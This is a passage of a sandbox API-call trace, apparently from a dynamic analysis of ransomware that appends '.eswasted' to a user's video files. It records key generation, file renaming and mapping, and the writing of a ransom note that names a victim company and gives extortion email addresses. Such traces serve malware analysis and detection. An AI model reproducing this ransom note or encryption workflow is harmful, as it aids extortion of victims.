KEY:\r\n[begin_key]LBTVHiptrPSUeBovl17ycxya4qq9GK2izhnlYkqxAlneLLIwY5f4DebRQtixT0Xk\r\nyOdWukDtPB6Se1oaGZVMh3kaWQzILUcKzAZ0MJBW2B3LDRJ4FCTm/B5jQSUTe03I\r\ndLWYpNbyx9O90nqXY69T1mLrVmJ0eVZ+V8n6SsYmmct6/PeSEAsf8caZnQ065+oE\r\nllDspAC9dYQfEaQSyVM+S1sK6Y+58fGFJNz0XrnIy9RxyhLRy34RqhBFrjDKPorE\r\n667twRAtu4np39Vl/Lel75fXbAzFbrTpSktb1TI4UN6PrnG/W/my6q6UARgYJjSL\r\nEFc2mhRjChK/LDAUbgSqhB/o8HldZRCBJwXLDI25ESrsCnGj/RHBNSQw3gJTFyu/\r\nv1uSB4lhi8rCty4q4WB66KY8uG3wEq/VjRYhOdrWZNtzGSgYr7rNN4hwEaiL/gUE\r\nQc9i37y0Dx5ywcp49C9UvXWYrfG78pv1aQG0MO7HerJILEQWeud/c+8uopbTCttt\r\nGvL7bQD5WTc/gYwcWYyJpugr36H7MlqZc2JTrkmpmrqkPTwwnhFG0/8EUowgoFTk\r\n7a5FwfMmA/1xbG8MctZ1RVDJlqINoeKLMOPqOe/+WQrxA8V6+HFIzVWPK12yhD0U\r\nyxW69CAv0L8EtYc+Vj+QMcqh/zwHELKUAwm9KD2/GDu=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.622] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0082.622] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.622] SetEndOfFile (hFile=0x118) returned 1 [0082.624] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.624] CloseHandle (hObject=0x118) returned 1 [0082.626] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.626] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fa808 | out: hHeap=0x4a0000) returned 1 [0082.626] _aulldvrm () returned 0x0 [0082.626] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.627] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.627] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\loXfsvFUJELERbvw.mp4") returned 75 [0082.627] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a0) returned 0x4cb238 [0082.627] lstrcpyW (in: lpString1=0x4cb2ce, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.627] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.627] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.627] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.628] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\loXfsvFUJELERbvw.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\loxfsvfujelerbvw.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.628] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.676] SetEndOfFile (hFile=0x118) returned 1 [0082.676] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.676] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.676] lstrcpyW (in: lpString1=0x4cb2ce, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\loXfsvFUJELERbvw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\loxfsvfujelerbvw.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\loXfsvFUJELERbvw.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\loxfsvfujelerbvw.mp4.eswasted")) returned 1 [0082.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\loXfsvFUJELERbvw.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\loxfsvfujelerbvw.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.677] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.677] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xa6c7 [0082.677] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa6c7) returned 0x2d0000 [0082.677] CloseHandle (hObject=0xfc) returned 1 [0082.680] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.681] CloseHandle (hObject=0xf8) returned 1 [0082.681] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4eaa28 [0082.681] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.681] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4eaa70 | out: pbBuffer=0x4eaa70) returned 1 [0082.681] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.682] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.682] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.682] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.690] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.690] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eaa28 | out: hHeap=0x4a0000) returned 1 [0082.690] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.690] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]F2y8dnYOWS2mIwKpMnDOC2HhAuD7xG+aMcrdVcRzMc8CN5lC1nYPWPJZx/tXyZD/\r\nwi2pke9QtEhQ31gDXDzzVrY5tc2Hm5OqleAAWkkvOS/OcS6MFMnnx9IU4GSfwnGb\r\nBTHjxt8mDvHpZruUiKloj7Dg8P9qFs/c+kYi2g9AwENf/qdBuzWAAO8E1mMX2QcU\r\nFEWqrmWzUXY9lBO0XQJH3t199+T7JU7TaMEMBVFHF+d1zPS8ryfmzGcp3YW1YDDs\r\nZkUFE3lbN+DZN0yZ5fQY+nyMvUmJP94C5Q14nqCtqSjo+DZ5nbv3FQ8uVLfmwvrT\r\nWBxqmctWgpl7LtPPtxxXgGU8GBnh4Az4onR7LjpyKLzmnz9Ow77zOFJh7BflKFgR\r\nF5+e6TS+qj4NmYDmGacKvfUkOR1iU10qI8sKqlVE4o8kNwJsSV6FSt/zN+yACIaT\r\nLPawGtAg983DUj8Gf/2+dmYPaWcPND54PXvwI3uhPumX8gBXOnPP+dVFaUPVOs1I\r\nqr2JYUV9z0MZuF8BAjhXgll9a1t85hJZls5bb2x+qcWqJlhEfphtK/0TrNZajBxv\r\nyr9+Gheno8+u+3z+mQYhYH+rD/+6XENF0r1FHk4eRFzNWjQhfNpP4+NKbvb1tQkV\r\ni5jQkxaVuaKxgf/nTZjTPI6DSTut+kl2Txz3tw5zL9F=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.691] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.691] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.691] SetEndOfFile (hFile=0x118) returned 1 [0082.693] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.693] CloseHandle (hObject=0x118) returned 1 [0082.695] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb238 | out: hHeap=0x4a0000) returned 1 [0082.695] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50b328 | out: hHeap=0x4a0000) returned 1 [0082.695] _aulldvrm () returned 0x0 [0082.695] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.696] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.696] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Qtgsg.flv") returned 64 [0082.696] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4eaa28 [0082.696] lstrcpyW (in: lpString1=0x4eaaa8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.696] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.696] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.697] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.697] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Qtgsg.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qtgsg.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.697] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.698] SetEndOfFile (hFile=0x118) returned 1 [0082.698] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.698] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.698] lstrcpyW (in: lpString1=0x4eaaa8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Qtgsg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qtgsg.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Qtgsg.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qtgsg.flv.eswasted")) returned 1 [0082.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\Qtgsg.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\qtgsg.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.699] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.699] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x14fd8 [0082.700] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14fd8) returned 0xb10000 [0082.700] CloseHandle (hObject=0xf8) returned 1 [0082.704] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.704] CloseHandle (hObject=0xfc) returned 1 [0082.704] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4eacc0 [0082.704] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.705] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ead08 | out: pbBuffer=0x4ead08) returned 1 [0082.705] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.705] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.706] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.706] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.714] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.714] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eacc0 | out: hHeap=0x4a0000) returned 1 [0082.714] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.714] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]h5ivymTyeF1Xm1NvntfhH3hJcZ5SoWFyfUKsJ7/8wZarlfx/K4dn/oqFT5w4eshz\r\n8+sqTFSm9r5ebQPu+N9G0syysWnW6HD50v0enGI+RMjukoZuasmoyhTL4RstoF2T\r\nynhL3KNNsfvtNHOZuruxfpqjBkzoF11pq22zuElmr/ph0WeGwqyoO94nR7UO49ck\r\nzmhw7SldtJ0VJQLyniaWLVV/JVjY5O2lPXzu8AUSHT5W9TA7uAtfhW8YT2IRUtjz\r\nX+1ODpgIuwsQldar1asJy3NvMeYPN9VQ/PNWsq47lqmwafCvxTrnMKHwvxKSGFZg\r\nv4892ta13Sy1qoPGrQCBmXBnyuN631MfRE/Ep0noQAo3oe+OxibGwKgh0Kbc6y9d\r\n5Md4vpqmexy3HipqB+hIf/8tEikG6Tq0t5RXWxc37CLHYBwmYmqmgJWab2bIWLTw\r\nwn97uME54iF+cZTdR0PXhpw6vDkdD/AuHBqb+vKty+sPelLCuPHS4TsyGyE65dVK\r\nL/zKZbeazvWLXMwgYZPcFZIDlBzdqtj78YSjnJjg44EJurC/WH60REEDCreZjFCU\r\nN3JgcYoN9AnbmnxszDrBEJoKhyUOaYleYqonXSN1X+30Q2zkZqwXV9e6QQROiaZI\r\nuP1louA5BQ48XUpSTdSKn4N2CLByZQtdl1ErneQhnHw=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.714] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.714] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.714] SetEndOfFile (hFile=0x118) returned 1 [0082.716] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.716] CloseHandle (hObject=0x118) returned 1 [0082.718] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eaa28 | out: hHeap=0x4a0000) returned 1 [0082.718] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fa8e8 | out: hHeap=0x4a0000) returned 1 [0082.718] _aulldvrm () returned 0x0 [0082.718] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.719] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.719] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.719] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\TI9xjq4EyWmiAAfbH.mkv") returned 76 [0082.719] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4eaa28 [0082.719] lstrcpyW (in: lpString1=0x4eaac0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.719] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.719] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.720] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.720] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\TI9xjq4EyWmiAAfbH.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ti9xjq4eywmiaafbh.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.750] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.751] SetEndOfFile (hFile=0x118) returned 1 [0082.751] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.751] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.751] lstrcpyW (in: lpString1=0x4eaac0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\TI9xjq4EyWmiAAfbH.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ti9xjq4eywmiaafbh.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\TI9xjq4EyWmiAAfbH.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ti9xjq4eywmiaafbh.mkv.eswasted")) returned 1 [0082.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\TI9xjq4EyWmiAAfbH.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ti9xjq4eywmiaafbh.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.752] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0082.752] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x3dc2 [0082.752] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3dc2) returned 0x2d0000 [0082.752] CloseHandle (hObject=0xf8) returned 1 [0082.754] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.754] CloseHandle (hObject=0x110) returned 1 [0082.754] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.754] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.755] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.755] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.755] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.756] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.756] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.764] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.764] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]VE7fjXwgyuaqyZB7D2+NpckMgM3n6vWDAxTrLjAOPUCDFWIseo/OgYPfy7cLJ14f\r\n5baow4ap9+uRy1kOY9mphPOBE3pIQbNugipUVL16eww547TVX95d2RaLWlEx66O0\r\ngtEfVr9e/aHeqph5rNCNWLYCrDP+OS1Inl25Ul48QAtHMQZOJUm2aTo7DY21m1sm\r\nK/h/5P178rkRwaSULAaaSvkmDL6Wrq1eO97fiEme11dR35PTAnhF4CXiHWHpslXY\r\nXtuqpilP+TJ/eBalpr1B61b9uq2daP+CQj60OG9eNm3XJUdzCoXmUF9bHU98+YS9\r\nm8ZXKaqKH5AFpC4LW8O6B3xnn1FYMue92pxizaGy30Y68B4m3SxLGfVVXvFiroTk\r\ncuLsBzGrQMQj+YkV97C8dWea4bNB5m6so78HVbcXOMtCnUbPFzNd6oCUu01QWi6G\r\nqTPFSLv55IrgmeRML1QDow+/CA69vllvEurx4LOM5F6Dyp4UDonLR6ZZzrwRHD94\r\nfAJBVtFFGaUtwf6oRB5ogD2+kLEibslSx9WQP+JASRTC+DsLEo7qOZQtaPHLv+fv\r\nHoB4GS36BjGXsKizinPssry4afB1TSv3aAyeB/lDVL5Ahau7UZ4wteg7y3JZJ2xw\r\nAJXJzX9GhBV7xGsgUDo/wqb4zeO97oMgIA9OxQn6OA3=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.764] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.764] WriteFile (in: hFile=0x118, 